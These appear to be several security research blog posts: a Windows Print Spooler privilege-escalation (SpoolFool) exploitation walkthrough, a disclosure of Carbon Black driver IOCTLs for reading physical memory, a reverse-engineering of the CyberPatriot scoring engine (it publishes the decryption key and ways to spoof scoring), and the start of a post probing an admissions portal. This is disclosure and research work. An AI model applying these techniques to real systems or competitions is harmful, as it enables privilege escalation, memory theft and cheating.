The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020–1030. I highly recommend reading Victor Mata’s blog post on CVE-2020–1030, but I’ll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it’s possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven’t fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations, where the user cannot create or mange a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020–1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (on other architectures, it’s not x64). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value — if the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  • 3. localspl.dll!SplCopyFileEvent is called if pszKeyName argument begins with CopyFiles\ string
  • 4. localspl.dll!SplCopyFileEvent reads the Module value from printer’s CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  • 5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  • 6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everybody the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During the both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping of the first four bytes of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\ printers\ becomes C:\Windows\System32\spool\drivers\x64\ printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There’s no need to trigger the exploit multiple times, doing so will most likely end up killing the Spooler service indefinitely until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, the exploit will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, the technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule is very reliable however, but assumes that the user can manage a printer, which is already the case for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999) was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

Reading Physical Memory using Carbon Black's Endpoint driver

14 February 2019 at 15:22
Reading Physical Memory using Carbon Black's Endpoint driver

Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I'll be looking at Carbon Black's endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black and they have said it is not a real security issue because it requires Administrator privileges.

Driver Authentication

The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the "\\.\CarbonBlack" pipe, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code of 0x81234024.

Setting Acquisition Mode

The acquisition mode is a value the driver uses to determine what method to take when reading physical memory, we'll get into this in the next section. To set the acqusition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as an uint32_t.

Physical Memory Read Accesss

The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attackers three methods/options of reading physical memory:

  1. If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory then copies the data.
  2. If Acquisition Mode is set to 1, the driver opens the "\Device\PhysicalMemory" section and copies the data.
  3. If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that.

To read physical memory, you must send the following buffer:

struct PhysicalMemReadRequest {
  uint64_t ptrtoread; // The physical memory address you'd like to read.
  uint64_t bytestoread; // The number of bytes to read.
};

The output buffer size should be bytestoread.

CR3 Access

Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker because it means they don't have to predict/bruteforce a directory base and instead can convert a physical memory address directly to a kernel virtual address with ease (vice-versa too!).

To call this IOCTL, you need to provide an empty input buffer and output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64t_t*)(outputbuffer).

Impact

You might ask what's the big deal if you need administrator for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, rather on corporate endpoints. If a company is willing to purchase a software such as Carbon Black to protect their endpoints, they're probably doing other secure measures too. This might include having a whitelisted driver system, secure boot, LSA Protection, etc. If an attacker gains administrator on the endpoint (i.e if parent process was elevated), then they could not only disable the protection of Carbon Black, but could use their driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system most likely undetected by any anti-virus on the system. I don't know about you, but to me this is not something I'd accept from the software that's supposed to protect me.

The hash of the cbk7.sys driver is ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256).

Reversing the CyberPatriot National Competition Scoring Engine

12 April 2019 at 22:10

Edit 4/12/2019

Reversing the CyberPatriot National Competition Scoring Engine

Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they can change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday which is why I am re-publishing this write up now.

Disclaimer

This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and therefore no longer subject to the competition’s rule book. This information is meant for educational use only and as fair use commentary for the competition in past years.

Preface

CyberPatriot is the air force association's "national youth cyber education program". The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.

The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on different aspects of the system that are vulnerable to see if they were patched.

I am a high school senior who participated in the competition 2015-2016, 2016-2017, 2017-2018 for a total of 3 years. My team got to regionals consistently and once got under the 12th place cut-off for an hour. The furthest my team got was regionals (once even got under 12th place for a good hour, which is the cut off for nationals). I did not participate this year because unfortunately the organization which was hosting CyberPatriot teams, ours included, stopped due to the learning curve.

This all started when I was cleaning up my hard drive to clear up some space. I found an old folder called "CyberPatriot Competition Images" and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing to compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I'm going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.

General Techniques

If all you wanted to do is see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that you don't see what they're actually checking, which is the juicy data we want.

Reversing

When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.

Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results of the checks to. The interesting part of the Scoring Engine is that this information is stored offline. This means, everything the virtual machine you are using will check is stored on disk and does not require an internet connection. This somewhat surprised me because storing the upload URL and other general information on disk makes sense, but storing what's going to be scored?

After initializing service related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called "ScoringResource.dat". This file is typically stored in the "C:\CyberPatriot" folder in the virtual machine.

The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call "InitializeScoringData". At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data, the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the "InitializeScoringData" function finds the path to the "ScoringResource.dat" file by referencing the path of the current module ("CCSClient.exe", the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) and uses AES-GCM. After finding the name of the "ScoringResource.dat" file, the engine initializes the CryptContext for decryption.

Reversing the CyberPatriot National Competition Scoring Engine

The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at Context + 0x4 and is 16 bytes. Following endianness, the key ends up being 0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 starting at the *(_DWORD*)(Context + 4) to the *(_DWORD*)(Context + 0x10).

After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call "DecryptData". This function is not only used for decrypting the Scoring Data, but also Scoring Reports.

The "DecryptData" function starts off by reading in the Scoring Data from the "ScoringResource.dat" file using the boost library. It then instantiates a new "CryptoPP::StringSink" and sets the third argument to be the output string. StringSink's are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The "DecryptData" function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call "DecryptBuffer".

The "DecryptBuffer" function first checks that the file is greater than 28 bytes, if it is not, it does not bother decrypting. The function then instantiates a "CryptoPP::BlockCipherFinal" for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the first 12 bytes of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.

After setting the key and IV used for the AES decryption, the function instantiates a "CryptoPP::ZlibDecompressor". It turns out that the Scoring Data is deflated with Zlib before being encrypted, thus to get the Scoring Data, the data must be inflated again. This Decompressor is attached to the "StreamTransformationFilter" so that after decryption and before the data is put into the OutputString, the data is inflated.

The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you'll hear me referring to the "HashVerificationFilter". The "AuthenticatedDecryptionFilter" decrypts and the "StreamTransformationFilter" allows the data to be used in a pipeline.

First, the function inputs the last 16 bytes of the file into the "HashVerificationFilter" and also the IV. Then, it inputs the file contents after the 12th byte into the "AuthenticatedDecryptionFilter" which subsequently pipes it into the "StreamTransformationFilter" which inflates the data on-the-go. If the "HashVerificationFilter" does not throw an error, it returns that the decryption succeeded.

The output buffer now contains the XML Scoring Data. Here is the format it takes:

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriotResource>
  <ResourceID></ResourceID>
  <Tier/>
  <Branding>CyberPatriot</Branding>
  <Title></Title>
  <TeamKey></TeamKey>
  <ScoringUrl></ScoringUrl>
  <ScoreboardUrl></ScoreboardUrl>
  <HideScoreboard>true</HideScoreboard>
  <ReadmeUrl/>
  <SupportUrl/>
  <TimeServers>
    <Primary></Primary>
    <Secondary>http://time.is/UTC</Secondary>
    <Secondary>http://nist.time.gov/</Secondary>
    <Secondary>http://www.zulutime.net/</Secondary>
    <Secondary>http://time1.ucla.edu/home.php</Secondary>
    <Secondary>http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime</Secondary>
    <Secondary>http://worldtime.io/current/utc_netherlands/8554</Secondary>
    <Secondary>http://www.timeanddate.com/worldclock/timezone/utc</Secondary>
    <Secondary>http://www.thetimenow.com/utc/coordinated_universal_time</Secondary>
    <Secondary>http://www.worldtimeserver.com/current_time_in_UTC.aspx</Secondary>
  </TimeServers>
  <DestructImage>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <InvalidClient></InvalidClient>
    <InvalidTeam/>
  </DestructImage>
  <DisableFeedback>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <NoConnection></NoConnection>
    <InvalidClient></InvalidClient>
    <InvalidTeam></InvalidTeam>
  </DisableFeedback>
  <WarnAfter/>
  <StopImageAfter/>
  <StopTeamAfter/>
  <StartupTime>60</StartupTime>
  <IntervalTime>60</IntervalTime>
  <UploadTimeout>24</UploadTimeout>
  <OnPointsGained>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!</Execute>
  </OnPointsGained>
  <OnPointsLost>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.</Execute>
  </OnPointsLost>
  <AutoDisplayPoints>true</AutoDisplayPoints>
  <InstallPath>C:\CyberPatriot</InstallPath>
  <TeamConfig>ScoringConfig</TeamConfig>
  <HtmlReport>ScoringReport</HtmlReport>
  <HtmlReportTemplate>ScoringReportTemplate</HtmlReportTemplate>
  <XmlReport>ScoringData/ScoringReport</XmlReport>
  <RedShirt>tempfile</RedShirt>
  <OnInstall>
    <Execute>cmd.exe /c echo Running installation commands</Execute>
  </OnInstall>
  <ValidClient> <--! Requirements for VM -->
    <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
    <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
    <ClientHash></ClientHash>
    <ProductID></ProductID>
    <DiskID></DiskID>
    <InstallDate></InstallDate>
  </ValidClient>
  <Check>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Penalty>
  <AllFiles>
    <FilePath></FilePath>
    ...
  </AllFiles>
  <AllQueries>
    <Key></Key>
    ...
  </AllQueries>
</CyberPatriotResource>

The check XML elements tell you exactly what they check for. I don't have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:

2016-2017 CP-IX High School Round 2 Windows 8: Here

2016-2017 CP-IX High School Round 2 Windows 2008: Here

2016-2017 CP-IX HS State Platinum Ubuntu 14: Here

2017-2018 CP-X Windows 7 Training Image: Here

Tool to decrypt

This is probably what a lot of you are looking for, just drag and drop an encrypted "ScoringResource.dat" onto the program, and the decrypted version will be printed. If you don't want to compile your own version, there is a compiled binary in the Releases section.

Github Repo: Here

Continuing reversing

After the function decrypts the buffer of Scoring Data, the "InitializeScoringData" parses through it and fills the information class with the data from the XML. The "InitializeScoringData" is only called once at the beginning of the engine and is not called again.

From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn't, decrypts again. This is when the second check is done to see whether or not the image should be destructed. The factors it checks includes checking the time, checking the DestructImage object of the XML Scoring Data, etc.

If the function decides to destruct the image, it is quite amusing what it does...

Reversing the CyberPatriot National Competition Scoring Engine

The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:

  • Deleting registry keys and the sub keys under them such as "SOFTWARE\\Microsoft\\Windows NT", "SOFTWARE\\Microsoft\\Windows", ""SOFTWARE\\Microsoft", "SOFTWARE\\Policies", etc.
  • Deleting files in critical system directories such as "C:\\Windows", "C:\\Windows\\System32", etc.
  • Overwriting the first 200 bytes of your first physical drive with NULL bytes.
  • Terminating every process running on your system.

As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they're quite serious when they say don't try to run the client on your machine.

After checking whether or not to destroy a system, it checks to see if the system is shutting down. If it is not, then it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call "ExecuteCheck".

The function "ExecuteCheck" essentially loops every pass condition for a check and executes the check instructions (i.e C:\trojan.exe Exists Equals true). I won't get into the nuances of this function, but this is an important note if you want to spoof that the check passed. The check + 0x54 is a byte which indicates whether or not it passed. Set it to 1 and the engine will consider that check to be successful.

After executing every check, the engine calls a function I call "GenerateScoringXML". This function takes in the data from the checks and generates an XML file that will be sent to the scoring server. It loops each check/penalty and checks the check + 0x54 byte to see if it passed. This XML is also stored in encrypted data files under "C:\CyberPatriot\ScoringData\*.dat". Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriot>
  <ResourceID></ResourceID>
  <TeamID/>
  <Tier/>
  <StartTime></StartTime>
  <VerifiedStartTime></VerifiedStartTime>
  <BestStartTime></BestStartTime>
  <TeamStartTime/>
  <ClientTime></ClientTime>
  <ImageRunningTime></ImageRunningTime>
  <TeamRunningTime></TeamRunningTime>
  <Nonce></Nonce>
  <Seed></Seed>
  <Mac></Mac>
  <Cpu></Cpu>
  <Uptime></Uptime>
  <Sequence>1</Sequence>
  <Tampered>false</Tampered>
  <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
  <ResourceHash></ResourceHash>
  <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
  <ClientHash></ClientHash>
  <InstallDate></InstallDate>
  <ProductID></ProductID>
  <DiskID></DiskID>
  <MachineID></MachineID>
  <DPID></DPID>
  <Check>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Penalty>
  <TotalPoints>0</TotalPoints>
</CyberPatriot>

After generating the Scoring XML, the program calls a function I call "UploadScores". Initially, this function checks internet connectivity by trying to reach Google, the first CyberPatriot scoring server, and the backup CyberPatriot scoring server. The function uploads the scoring XML to the first available scoring server using curl. This function does integrity checks to see if the score XML is incomplete or if there is proxy interception.

After the scoring XML has been uploaded, the engine updates the "ScoringReport.html" to reflect the current status such as internet connectivity, the points scored, the vulnerabilities found, etc.

Finally, the function ends with updating the README shortcut on the Desktop with the appropriate link specified in the decrypted "ScoringResource.dat" XML and calling "DestructImage" again to see if the image should destruct or not. If you're worried about the image destructing, just hook it and return 0.

Conclusion

In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope that this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next years CyberPatriot, but I am not sure to what extent they will change things.

If you're wondering how I got the "ScoringResource.dat" files from older VM images, there are several methods:

  • VMWare has an option under File called "Map Virtual Disks". You can give it a VMDK file and it will extract it for you into a disc. You can grab it from the filesystem there.
  • 7-Zip can extract VMDK files.
  • If you want to run the VM, you can set your system time to be the time the competition was and turn off networking for the VM. No DestructImage :)

Hacking College Admissions

13 April 2019 at 14:13
Hacking College Admissions

Getting into college is one of the more stressful time of a high school student's life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that "they're the one". Some families do as much as they can to improve their chances - even going as far as trying to cheat the system. For wealthier families, this might be donating a very large amount to the school or as we've heard in the news recently, bribing school officials.

If you don't know about me already, I'm a 17-year-old high school senior that has an extreme interest in the information security field and was part of the college admissions process this year. Being part of the college admissions process made me interested in investigating, "Can you hack yourself into a school?". In this article, I'll be looking into TargetX, a "Student Lifecycle Solution for Higher Education" that serves several schools. All of this research was because of my genuine interest in security, not because I wanted to get into a school through malicious means.

Investigation

The school I applied to that was using TargetX was the Worcester Polytechnic Institute in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that shot out at me, https://wpicommunity.**force.com**/apply. Force.com reminded me of Salesforce and at first I didn't think Salesforce did college admissions portals. Visiting force.com brought me to their product page for their "Lightning Platform" software. It looked like it was a website building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce's "Lightning Platform" to create a college admissions portal.

After registering, I started to analyze what was being accessed. At the same time, I was considering that this was a Salesforce Lightning Platform. First, I found their REST api platform hinged on a route called "apexremote", this turned out to be Salesforce's way of exposing classes to clients through REST. Here is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access API's that you were supposed to access and it was pretty shut down. I thought about other API's Salesforce might expose and found out they had a separate REST/SOAP API too. In WPI's case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).

